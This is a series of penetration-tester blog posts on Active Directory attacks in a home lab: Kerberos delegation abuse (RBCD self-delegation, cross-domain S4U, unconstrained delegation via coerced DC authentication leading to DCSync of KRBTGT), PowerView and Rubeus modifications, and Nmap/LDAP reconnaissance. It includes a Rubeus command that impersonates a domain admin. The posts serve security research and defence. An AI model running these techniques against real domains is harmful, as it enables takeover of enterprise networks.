  1. ObjectSID is the objects security idenfitier (i.e S-1-5-21-2042794111-3163024120-2630140754-1113).
  2. ObjectSDDL is the security descriptor of the object in SDDL string format.

There is also an -OutFile parameter that can be used to output the SD's and SID's to a file:

The -OutFile argument appends when the file exists so different SD's can be added dynamically:

It is also possible to retrieve several SD's at the same time, by piping the identities into Get-DomainObjectSD, like with other PowerView functions:

A -Check parameter exists which allows the current SD to be compared to a supplied one. If it's the same just a warning will be thrown but if the SD is different, a warning will be thrown and the object will be returned:

The -Check parameter also takes a file containing multiple account SD's to be checked:

Escalating A User

So after adding the testsd user to the Domain Admins group, the AdminCount attribute was set as expected:

After a while and retreiving the SD using Get-DomainObjectSD function and diffing the 2 SD's shows that they are significantly different:

Removing testsd from the Domain Admins group, leaves the AdminCount set to 1, as shown below:

The AdminCount attribute can easily be cleared using Set-DomainObject's -Clear parameter:

Set-DomainObjectSD

This is where Set-DomainObjectSD comes in. Set-DomainObjectSD can only be used from an account that has owner privileges on the object, this is partly why the -Owner switch was added to Get-DomainUser.

There are 2 ways to set object SD's with Set-DomainObjectSD, firstly using an input file with the -InputFile parameter, this takes a csv file in the same format created by Get-DomainObjectSD:

This will apply all SD's contained within the provided file. The other way is to specify the object identity and the SDDL string manually with -SDDLString:

If multiple identities are specified here, the same SD will be applied to them, unlike if an input file is provided.

Some Other Useful Features

I have added 2 other useful functions, Find-HighValueAccounts and Get-DomainDCSync.

Find-HighValueAccounts

As mentioned above, the AdminCount attribute remains even after the user has been removed from the protected group. I wanted a way to find all current members of these groups. For this I created Find-HighValueAccounts, by default it returned the full user and computer objects (I've selected just the samaccountname so it can be displayed better):

It gets group membership recursively. You can specify which type of object to return with the -Users and -Computers switches. It also supports -SPN for returning accounts with service principal names, -Enabled and -Disabled, -AllowDelegation and -DisallowDelegation; and -PassNotExpire to search for accounts that are configured to not require a regular password reset.

Get-DomainDCSync

Another useful function I created is Get-DomainDCSync which gets the ACL from the domain head, and determines which result in the ability to perform a DCSync. This is primarily 2 different types of ACE's, GenericAll or both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. This function again returns the full object and by default returns user and computer objects:

This function also gets group membership recursively and also provides the ability to filter by object type, with -Users and -Computers but this time also includes the ability to filter by groups too with -Groups.

Get-DomainUser

I've also added a few features to some standard PowerView functions, including Get-DomainUser.

Along with the already mentioned -Owner switch, I added -Enabled, -Disabled -PassNotExpire switches which are pretty self-explainatory. A -Unconstrained switch which filters user accounts that are configured for unconstrained delegation. A -RBCD switch which returns user accounts that have a non empty msds-allowedtoactonbehalfofotheridentity attribute. A -PassLastSet parameter which will only return user accounts that have not changed their password for at least a number of days:

I've also added the -Locked and -Unlocked switches. These take into account the domain lockout duration policy into account. So if a user account has been locked 31 minutes ago but the lockout duration policy is set to 30, the account will be returned as unlocked.

Get-DomainComputer

For Get-DomainComputer I've added 2 switches, -RBCD and -ExcludeDCs. The -RBCD switch which returns computer accounts that have a non empty msds-allowedtoactonbehalfofotheridentity attribute. -ExcludeDCs allows you to filter out domain controllers from the results, useful for searching for computer accounts configured for unconstrained delegation:

Conclusion

I do plan on making more additions to PowerView but hopefully these will be useful on assessments.

Until then you can grab my fork of PowerView here.

Revisiting 'Delegate 2 Thyself'

So while still trying to ingest the great blog post by Elad Shamir Wagging the Dog, I discovered a section called Solving a Sensitive Problem which improves on the method I used in my Delegate 2 Thyself post. This post is about that improvement and an abuse case using it.

I highly recommend reading both of those posts before reading this if you haven't done already.

The Improvement

An S4U2Self service ticket can be retrieved by any machine account, without any prior configuration.

As shown below, this machine account for EIIS1 is not configured for any type of delegation:

Also, the external.admin user is marked as Account is sensitive and cannot be delegated:

Elad says that it is still possible to impersonate as that user on the requesting system (EIIS1), all that's required are the machine account credentials or TGT.

Automating the Process

In the Wagging the Dog post, Elad was using an ASN.1 editor to modify the S4U2Self ticket obtained using Rubeus. I decided to modify Rubeus so that this process was fully automated.

All this modification does is add's a /self flag to Rubeus's s4u command, when that's used and the /altservice flag is also used, the value to /altservice (in the format of the full SPN, eg. host/computer.domain.com) is subsituted into the sname field in the returned S4U2Self ticket.

Trying It Out

In the previous post I started with code execution to the IIS server EIIS1, which is the same position here:

We already know that this user can use the tgtdeleg trick to get a usable TGT:

Now it's important to understand the rest I perform from a separate non domain-joined system. I tend to see a lot of questions about performing attacks from systems that aren't domain-joined but due to the nature of most of my work, I almost always perform the attacks from my own, non domain-joined system, so I do in my blog posts too.

So next I perform the S4U2Self using the TGT we just recieved from a different system:

As you can see here, I've requested the S4U2Self ticket then rewrote the sname to http/eiis1.external.zeroday.lab as the user that cannot de delegated external.admin, the resulting ticket can be seen in the following klist output:

This ticket can then be used to execute commands over PowerShell remoting:

Conclusion

Obviously, the only way you can take advantage of this is if you can get access to the credentials or TGT of the target system.

But it can still be used for privilege escalation and, in the case of gaining access to a system configured for unconstrained delegation, remote code exectution (because you will be able to gather usable TGT's for remote systems).

The advantages of this over the full S4U2Proxy approach is that no configuration changes are required and you are able to impersonate protected users.

The advantages of this over a traditional silver ticket is that the resulting ticket contains a valid PAC.

A Strange Case of Trusts, Machine Accounts and DNS

While playing about with my Active directory (AD) lab infrastructure, I discovered I was able to create machine accounts across domain trusts. This led to the following bit of research.

There's been a lot of research into the impact of users creating machine accounts, including by Kevin Robertson's here and by Elad Shamir here but not much discussed about doing this across a domain trust.

The Setup

The lab I'm using for this blog post is setup as follows:

So here there are 3 forests and 4 domains (1 child domain). For the sake of simplicity this is a completely flat network, so all machines can access all other machines.

We have access to a low privileged user in the other.zeroday.lab domain.

This domain has a bidirectional external trust with the child domain child1.internal.zeroday.lab:

The child1.internal.zeroday.lab domain has an addition trust with it's parent domain internal.zeroday.lab:

Limitations Of The Current Position

It is not possible to authenticate against the internal.zeroday.lab domain using the current user:

And therefore, it is not possible to perform any real enumeration against that domain.

Also, it is not possible to create DNS records in the child1.internal.zeroday.lab domain:

Enter Machine Accounts

So while trying some things on this lab I attempted to create a machine account in child1.internal.zeroday.lab using the other.user user from other.zeroday.lab, and it worked:

The reason I tried this initially was because I wanted to create a DNS record in the trusted domain, which is now possible using this newly created machine account:

This shows that I now have more privileges on the trusted domain than I did otherwise.

But the implications were bigger, I can now use this machine account to query other trusted domains. So I can now enumerate trusts for the trusted domain internal.zeroday.lab:

And as a result, it's also possible to perform attacks such as kerberoasting against those trusted domains:

As well as triggering the printer bug discovered by Lee Christensen.

So we now clearly have much greater privileges across the enterprise than we did with only the user account we started out with.

Limitations Of Machine Accounts

While the machine accounts can create other machine account within the same domain (as I mentioned in my delegate to thyself post, a machine account is not able to create machine accounts across a trust:

This means we cannot use this machine account to pivot across the whole enterprise and gain access to the external.zeroday.lab domain without compromising another user account.

Conclusion

For me at least, this makes clear that the machine account quota configuration is more important than previously thought. By leaving this configuration at anything but 0, you allow for attackers on any domains that you have trust relationships with, to perform attacks against all other domains you have trust relationships with. Clearly it's not a huge impact if your domain only has 1 trust, then the main impact I can see is the ability for an attacker on the other domain to create DNS records within your domain.

More research is definitely needed in this area, I can't help but feel that this opens up new attacks that I'm not currently seeing.

Crossing Trusts 4 Delegation

The purpose of this post is to attempt to explain some research I did not long ago on performing S4U across a domain trust. There doesn't seem to be much research in this area and very little information about the process of requesting the necessary tickets.

I highly recommend reading Elad Shamir's Wagging the Dog post before reading this, as here I'll primarily focus on the differences between performing S4U within a single domain and performing it across a domain trust but I won't be going into a huge amount of depth on the basics of S4U and it's potential for attack, as Elad has already done that so well.

Motivation

I first thought of the ability to perform cross domain S4U when looking at the following Microsoft advisory. It states:

“To re-enable delegation across trusts and return to the original unsafe configuration until constrained or resource-based delegation can be enabled, set the EnableTGTDelegation flag to Yes.”

This makes it clear that it is possible to perform cross domain constrained delegation. The problem was I couldn't find anywhere that gave any real detail as to how it is performed, and the tools used to take advantage of constrained delegation did not support it.

Luckily Will Schroeder published how to simulate real delegation traffic:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# translated from the C# example at https://msdn.microsoft.com/en-us/library/ff649317.aspx

# load the necessary assembly
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')

# execute S4U2Self w/ WindowsIdentity to request a forwardable TGS for the specified user
$Ident = New-Object System.Security.Principal.WindowsIdentity @('[email protected]')

# actually impersonate the next context
$Context = $Ident.Impersonate()

# implicitly invoke S4U2Proxy with the specified action
ls \\PRIMARY.TESTLAB.LOCAL\C$

# undo the impersonation context
$Context.Undo()

This allowed me to figure out how it works and implement it into Rubeus.

Recap

To perform standard constrained delegation, 3 requests and responses are required: 1. AS-REQ and AS-REP, which is just the standard Kerberos authentication. 2. S4U2Self TGS-REQ and TGS-REP, which is the first step in the S4U process. 3. S4U2Proxy TGS-REQ and TGS-REP, which is the actual impersonation to the target service.

I created a visual representation as the ones I've seen previously weren't the easiest to understand:

In this it's the ticket contained within the final TGS_REP that is used to access the target service as the impersonated user.

Some Theory

After hours of using Will's Powershell to generate S4U traffic and staring at packet dumps, this is how I understood cross domain S4U to work:

Clearly there's a lot more going on here, so let me try to explain.

  1. The first step is still the same, a standard Kerberos authentication with the local domain controller. (1 and 2)

  2. A service ticket is requested for the foreign domains krbtgt service from the local domain controller. (3 and 4)

    • The users real TGT is required for this request.
    • This is known as the inter-realm TGT or cross domain TGT. This resulting service ticket is used to request service tickets for services on the foreign domain from the foreign domain controller.

    Here's where things start to get a little complicated. And the S4U2Self starts.

  3. A service ticket for yourself as the target user you want to impersonate is requested from the foreign domain controller. (5 and 6)

    • This requires the cross domain TGT.
    • This is the first step in the cross domain S4U2Self process.
  4. A service ticket for yourself as the user you want to impersonate is now requested from the local domain controller. (7 and 8)

    • This request includes the users normal TGT as well as having the S4U2Self ticket, received from the foreign domain in step 3, attached as an additional ticket.
    • This is the final step in the cross domain S4U2Self process.

    And finally the S4U2Proxy requests. As with S4U2Self, it involves 2 requests, 1 to the local DC and 1 to the foreign DC.

  5. A service ticket for the target service (on the foreign domain) is requested from the local domain controller. (9 and 10)

    • This requires the users real TGT as well as the S4U2Self ticket, received from the local domain controller in step 4, attached as an additional ticket.
    • This is the first step in the cross domain S4U2Proxy process.
  6. A service ticket for the target service is requested from the foreign domain controller. (11 and 12)

    • This requires the cross domain TGT as well as the S4U2Proxy ticket, received from the local domain controller in step 5, as an additional ticket.
    • This is the service ticket used to access the target service and the final step in the cross domain S4U2Proxy process.

I implemented this full process into Rubeus with this PR, which means that the whole process can be carried out with a single command.

The implementation primarily involves the CrossDomainS4U(), CrossDomainKRBTGT(), CrossDomainS4U2Self() and CrossDomainS4U2Proxy() functions, along with the addition of 2 new command line switches, /targetdomain and /targetdc, and some other little modifications.

Basically when /targetdomain and /targetdc are passed on the commandline, Rubeus executes a cross domain S4U, otherwise a standard one is performed.

What's The Point?

Good question. This could be a useful attack path in some unusual situations. Let me try to explain one.

Consider the following infrastructure setup:

There are 2 domains, in a single forest. internal.zeroday.lab (the parent and root of the forest) and child1.internal.zeroday.lab (a child domain).

We've compromised a standard user, child.user, on child1.internal.zeroday.lab, this user can also authenticate against the SQL server ISQL1 in internal.zeroday.lab as a low privileged user:

As Elad mentions in the MSSQL section of his blog post, if the SQL server has the WebDAV client installed and running, xp_dirtree can be used to coerce an authentication to port 80.

What is important here is that the machine account quota for internal.zeroday.lab is 0:

This means that the standard method of creating a new machine account using the relayed credentials will not work:

The machine account quota for child1.internal.zeroday.lab is still the default 10 though:

So the user child.user can be used to create a machine account within the child1.internal.zeroday.lab domain:

As the machine account belongs to another domain, ntlmrelayx.py is not able to resolve the name to a SID:

For this reason I made a small modification which allows you to manually specify the SID, rather than a name. First we need the SID of the newly created machine account:

Now the --sid switch can be used to specify the SID of the machine account to delegate access to:

The configuration can be verified using Get-ADComputer:

Impersonation

So now everything is in place to perform the S4U and impersonate users to access ISQL1.

The NTLM hash of the newly created machine account is the ast thing that is required:

The following command can be used to perform the full attack and inject the service ticket for immediate use:

1
.\Rubeus.exe s4u /user:TestChildSPN$ /rc4:C4B0E1B10C7CE2C4723B4E2407EF81A2 /domain:child1.internal.zeroday.lab /dc:IC1DC1.child1.internal.zeroday.lab /impersonateuser:internal.admin /targetdomain:internal.zeroday.lab /targetdc:IDC1.internal.zeroday.lab /msdsspn:http/ISQL1.internal.zeroday.lab /ptt

This command does a number of things but simply put, it authenticates as TestChildSPN$ from child1.internal.zeroday.lab against IC1DC1.child1.internal.zeroday.lab and impersonates internal.admin from internal.zeroday.lab to access http/ISQL1.internal.zeroday.lab.

Now let's look at this in a bit more detail.

As described previously, the first step is to perform a standard Kerberos authentication and recieve the account's TGT that has been delegated access (TestChildSPN in this case):

This TGT is then used to request the cross domain TGT from IC1DC1.child1.internal.zeroday.lab (the local domain controller):

This is simply a service ticket to krbtgt/internal.zeroday.lab. This cross domain TGT is then used on the foreign domain in exactly the same manner the users real TGT is used on the local domain.

It is this ticket that is then used to request the S4U2Self service ticket for TestChildSPN$ for the user internal.admin from IDC1.internal.zeroday.lab (the foreign domain controller):

To complete the S4U2Self process, the S4U2Self service ticket is requested from IC1DC1.child1.internal.zeroday.lab, again for TestChildSPN$ for the user internal.admin, but this time the users real TGT is used and the S4U2Self service ticket retrieved from the foreign domain in the previous step is attached as an additional ticket within the TGS-REQ:

To begin the impersonation, a S4U2Proxy service ticket is requested for the target service (http/ISQL1.internal.zeroday.lab in this case) from IC1DC1.child1.internal.zeroday.lab. As this request is to the local domain controller the users real TGT is used and the local S4U2Self, received in the previous step, is atached as an additional ticket in the TGS-REQ:

Lastly, a S4U2Proxy service ticket is also requested for http/ISQL1.internal.zeroday.lab from IDC1.internal.zeroday.lab. As this request is to the foreign domain controller, the cross domain TGT is used, and the local S4U2Proxy service ticket received in the previous step is attached as an additional ticket in the TGS-REQ. Once the final ticket is received, Rubeus automatically imports the ticket so it can be used immediately:

Now that the final service ticket has been imported it's possible to get code execution on the target server:

Conclusion

While it was possible to perform this across trusts within a single forest, I didn't manage to get this to work across external trusts. It would probably be possible but would require a non-standard trust configuration.

With most configurations this wouldn't be required as you could either create a machine account within the target domain or delegate to the same machine account, as I've discussed in a previous post, but it's important to understand the limits of what is possible with these types of attacks.

The mitigations are exactly the same as Elad discusses in his blog post as the attack is exactly the same, the only difference is here I'm performing it across a domain trust.

Acknowledgements

A big thaks to Will Schroeder for all of his work on delegation attacks and Rubeus. Also Elad Shamir for his detailed work on resource-based constrained delegation attacks and contributions to Rubeus which helped me greatly when trying to implement this. Benjamin Delpy for all of his work on Kerberos tickets in mimikatz and kekeo.

I'm sure there are many more too, without these guys work, research in this area would be much further behind where it currently is!

Delegate 2 Thyself

This post is also avaliable in PDF format here.

So a situation arose on the BloodHound Slack channel recently which is very similar to the one I'm going to describe in this post and the user could have benefited from this so I've decided to speed up my writing of this particular post. It's going to involve using resource-based constrained delegation (RBCD) for local privilege escalation.

Firstly, there are much better resources for a full explaination of the RBCD theory and attack vectors, the best I've read Wagging the Dog by Elad Shamir but also this and this by Will Schroeder, and even the Microsoft Kerberos documentation if you are really looking at understanding how Kerberos works as a whole.

I learned everything I know about RBCD from the posts mentioned above, so I highly recommend reading and understanding those if you truly want to understand RBCD.

Here I'll simply be explaining an attack that, while very similar to some being spoken about, I've not really seen anywhere, while trying to clear up a few areas of confusion a lot of people seem to have on the topic.

Resource-Based Constrained Delegation 101

While those other posts are without doubt the place to go if you want to understand how this works, I'll try to give a little recap of the essentials here.

Delegation is used in Kerberos to allow services to delegate (impersonate) as other users to other services. This is so that, for example, if a user access a web server and that web server is using a database server in the background, the web server is able to impersonate the user to access the database server and only gain access to the data owned by that user.

Resource-Based Constrained Delegation is governed by an Access Control List (ACL) contained within the msDS-AllowedToActOnBehalfOfOtherIdentity Active Directory attribute of the target machine account. This means if you want AccountA to be able to delegate to AccountB, then you have to set an Access Control Entry (ACE) within the ACL in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on AccountB for AccountA.

Confusion 1 - Service Accounts

So as Elad mentions in his post that SYSTEM, NT AUTHORITY\NETWORK SERVICE and Microsoft Virtual Accounts all authenticate on the network as the machine account on domain-joined systems. This is really useful to know as most Windows services on modern versions of Windows will run using a Microsoft Virtual Account by default. The 2 most notable are IIS and MSSQL but I'm sure there are many more.

This can be verified very easily:

This authenticates against 192.168.71.198 where I have impacket's smbserver.py script listening:

In any situation where the machine is domain-joined and you can run code as NT AUTHORITY\NETWORK SERVICE or a Microsoft Virtual Account, you can use RBCD for local privilege escalation, provided that Active directory hasn't been hardered to mitigate the RBCD attacks completely (which is very rarely the case).

The Situation

So here I'm going to perform the attack from a domain-joined (external.zeroday.lab) IIS server (EIIS1) where code execution has already been achieved. As we already know, this account will authenticate on the domain as the machine account:

Firstly, load the the ADModule from Nikhil Mittal and Will Schroeder's PowerView to be used throughout this post:

The last thing to note is a domain admin (and the user we're going to impersonate) is external.admin:

Confusion 2 - Machines Creating Machines

Generally with these RBCD attacks you require a second account with an service principal name (SPN), the common method is to create a new machine account as by default the machine account quota is 10:

I've seen some confusion on whether a machine account can be used to create another machine account. It is possible to create a machine account using a machine account, this can be done using Kevin Robertson's Powermad:

Now querying the domain controller, the newly created machine account can be seen:

The Crazy Bit

For this post though, I want to show that even if the machine account quota is 0, and access to another account with an SPN hasn't been achieved, it's still possible to abuse RBCD for privilege escalation. So the machine account quota has been reset to 0:

Now it is not possible to create a new machine account:

So here's the main reason for this blog, I was thinking one day "I wonder if a machine can delegate access to itself". So effectively, I (the machine account) want to tell the domain controller that I (the machine account) wants the ability to delegate access to myself (the machine account). I'm not sure why this would ever be required in a normal setup, but it in fact is possible.

So using the shell that I've already imported the ADModule, I can set the msDS-AllowedToActOnBehalfOfOtherIdentity:

This is all that is required to configure RBCD. To demonstrate that it has infact worked, I can run Get-ADComputer from another terminal (because showing the extended attributes using the ADModule doesn't work):

So now I have the ability to impersonate any domain user on the machine, that isn't in the Protected Users group or marked as Sensitive and cannot be delegated.

Abusing This Configuration

There's one more piece of the puzzle before we can actually perform the attack. We need to be able to pass Rubeus credentials for the machine account. This can be in the form of a username and password, or a TGT ticket.

Luckily Benjamin Delpy figured out how to do this, it's now called the tgtdeleg trick and it's also been implemented in Rubeus.

So after downloading Rubeus onto the compromised system, we can easily use it to grab a usable TGT:

That TGT can be used with the s4u Rubeus command to request a service ticket to HTTP/EIIS1.external.zeroday.lab (myself) as the user external.admin and injected into the current context:

Now when we use Invoke-Command to EIIS1.external.zeroday.lab, it runs as external.admin:

Cleanup

When on an assessment, it's always important to clean up any changes made to systems to return them to the original settings as much as possible. The RBCD configuration can be reset to it's original state using the machine account again, if domain admin privileges hasn't been achieved.

If the configuration was originally empty, this can be done in the following way:

And to verify that this worked:

Conclusion

Delegation is hard and often configured wrong so it's important to understand the scope of what is possible using these Kerberos features.

Active Directory in it's default configuration is vulnerable to a number of different attacks and these settings rarely get changed by the system administrator so this is often a very fruitful avenue for an attacker.

To secure AD against this attack is no different to those described by Elad in his post, there's nothing really new here apart from the idea of delegating to the same account.

Abusing Users Configured with Unconstrained Delegation

An interesting situation came up on a recent assessment which triggered me into do a bit of research in the area as I'd seen nothing published on this particular issue.

I'd been really interested in the research done on the area of Kerberos Delegation. For this post, I'll be discussing Unconstrained Delegation, which has been covered a great deal in other places, notably here by Sean Metcalf and here by Dirk-jan Mollema, amongst others. If you really want to understand what is going on here, it might be best to read their work and understand it before continuing, although I'll try to give a recap here.

Unconstrained Delegation 101

In a nutshell, unconstrained delegation is when a user or computer has been granted the ability to impersonate users in an Active Directory domain with the only restriction of those contained within the Protected Users group or marked Sensitive and cannot be delegated.

What happens in short (read Sean's post if you want a detailed explaination, that's where this section is plagiarised from), after a user has already authenticated and wants to access a service that's been configured for unconstrained delegation:

  1. The user presents it's TGT to th DC when requesting a service ticket.

  2. The DC opens the TGT & validates PAC checksum – If the DC can open the ticket & the checksum check out, the TGT is valid. The data in the TGT is effectively copied to create the service ticket. The DC places a copy of the user’s TGT into the service ticket.

  3. The service ticket is encrypted using the target service accounts’ NTLM password hash and sent to the user (TGS-REP).

  4. The user connects to the server hosting the service on the appropriate port & presents the service ticket (AP-REQ). The service opens the service ticket using its NTLM password hash.

The diagram below (also taken from Sean's post) shows the full process:

The Situation

While abusing unconstrained delegation has been covered in detail many times, all of these posts address machine accounts, I've not yet seen anything related to abusing users configured for unconstrained delegation.

The setup for the demo is simple. A domain internal.zeroday.lab, with a domain controller IDC1 and a user TestUCSPN which has been configured for unconstrained delegation, as can be seen below:

As shown, the TrustedForDelegation attribute is set to True and the ServicePrincipalName is set to cifs/notexist.internal.zeroday.lab. The cifs service is being used here purly for convinence in demonstrating the issue.

The DNS record for notexist.internal.zeroday.lab does not exist:

This is all that is required to exploit it because the password for the machine account is not needed, but in this example the machine account also doesn't exist:

This allows me to demonstrate that it is still exploitable, by creating the machine account, using Kevin Robertson's Powermad:

Abuse

While it doesn't matter if the machine account is created in Active Directory, the DNS record needs to not exist for this attack to work (or it needs to point to a machine under your control).

If the DNS record doesn't exist, like in this example, it's easy to create one using any valid domain user account. Here I'm using Dirk-jan Mollema's krbrelayx:

Here 192.168.71.198 is the IP address of a Linux system under my control.

Sometimes it takes a little while for the name to resolve so it's good to check before continuing:

Now everything is in place to abuse this configuration. First, we need the hash of the service account's password (TestUCSPN in this case). For this Benjamin Delpy's tool mimikatz does the job nicely:

To retrieve the target's TGT ticket, we'll again use Dirk-jan Mollema's krbrelayx:

And from the same repository the printerbug.py script to trigger the authentication from the domain controller (192.168.71.20) to the target SPN host (notexist.internal.zeroday.lab):

This coerces the domain controller to authentication to the CIFS service on host noexist.internal.zeroday.lab where the krbrelayx.py script is listening. The krbrelatx.py script saves the ticket in ccache format:

This saved the ticket in the current working directory with the name [email protected][email protected].

For some reason, converting it to kirbi format using krbrelayx.py was failing with the error below:

Of course, you could using the ccache format with impacket but I decided to use Will Schroeder's Rubeus so I needed the ticket in kirbi format.

To convert the ticket I used Zer1t0's ticket_converter and then base64 encoded it:

This is now usable by Rubeus.

First, to demonstrate the a DCSync is not possible from the current context, mimikatz was used:

Lastly, Rubeus is used to inject the ticket into the current context and then mimikatz is able to perform a DCSync of the KRBTGT account from the domain controller:

Conclusion

One of the interesting things I find about attacks like this is here I used the TGT for the domain controller IDC1 to perform a DCSync from the same domain controller IDC1. I'm not sure why this is possible as I can see no reason why a domain controller would need to synchronize with itself, but it works...

This post is, as far as I've seen, the first explaination of how to take advantage of unconstrained delegation without requiring to compromise any machines and while it's most likely an uncommon situation, I have seen this in the wild recently.

Kerberos delegation is a really interesting point of research and I'm sure there will be plenty more research coming out in the future so it's well worth getting up to date with the current research out there.

Active Directory Reconnaissence - Part 1

So it's been a long time since I've blogged anything but I've finally ported my blog from Octopress and am now in a better position to update it.

For a while now I've been focusing on learning as much as possible about perfomring infrastructure security assessments and particularly Active Directory (AD), so it makes sense to start creating some blog posts regarding that.

AD is a highly complex database used to protect the rest of the infrastructure by providing methods to restrict access to rsources and segregate resources from each other. However, partly due to it's complexity and partly due to backwards compatibility, it's very common for insecure configurations to be in place on corporate networks. Due to this and the fact that it is usually used to provide access to huge sections of the infrastructure, it's a high value target to attack.

In this post, I'll demonstrate some basic reconnaissence that might be possible from a completely unauthenticated position on the infrastructure.

Lab Configuration

The lab configuration is simple, as shown below:

The main thing here is that the IP address of the domain controller is 192.168.73.20.

Basic Scanning

The first step would be to perform a port scan of the target system. Nmap is a common choice for a port scan and for good reason, Nmap has tons of options and is capable of much more than simple port scanning.

A basic port scan using Nmap of the top 1000 TCP ports is shown:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
Lab:~# nmap -sT -Pn -n --open 192.168.73.20
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 23:35 GMT
Nmap scan report for 192.168.73.20
Host is up (0.00040s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 3.08 seconds

As shoiwn above, a bunch of ports are open on the target domain controller, these can be further probed using the -sV option:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Lab:~# nmap -sT -Pn -n --open 192.168.73.20 -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 23:38 GMT
Nmap scan report for 192.168.73.20
Host is up (0.0013s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-12 23:38:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: internal.zeroday.lab, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: ICHILD1)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: internal.zeroday.lab, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/12%Time=5E448C70%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: IC1DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.72 seconds

This is known as a service scan and attempts to probe the listening service and return a reliable software name and version.

Some Basic Enumeration

LDAP Enumeration

As we can see Lightweight Directory Access Protocol (LDAP) is listening on a number of ports. That is an indication that this system is a domain controller.

The LDAP specification states that the server must provide some information about the {RootDSE](https://ldapwiki.com/wiki/RootDSE){:target="_blank"} even without authentication. This allows us to gather some basic information about the domain:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
Lab:~# nmap -sT -Pn -n --open 192.168.73.20 -p389 --script ldap-rootdse
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 23:59 GMT
Nmap scan report for 192.168.73.20
Host is up (0.0012s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       currentTime: 20200212235943.0Z
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       dsServiceName: CN=NTDS Settings,CN=IC1DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       namingContexts: CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       namingContexts: CN=Schema,CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       namingContexts: DC=ForestDnsZones,DC=internal,DC=zeroday,DC=lab
|       namingContexts: DC=child1,DC=internal,DC=zeroday,DC=lab
|       namingContexts: DC=DomainDnsZones,DC=child1,DC=internal,DC=zeroday,DC=lab
|       defaultNamingContext: DC=child1,DC=internal,DC=zeroday,DC=lab
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       configurationNamingContext: CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       rootDomainNamingContext: DC=internal,DC=zeroday,DC=lab
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
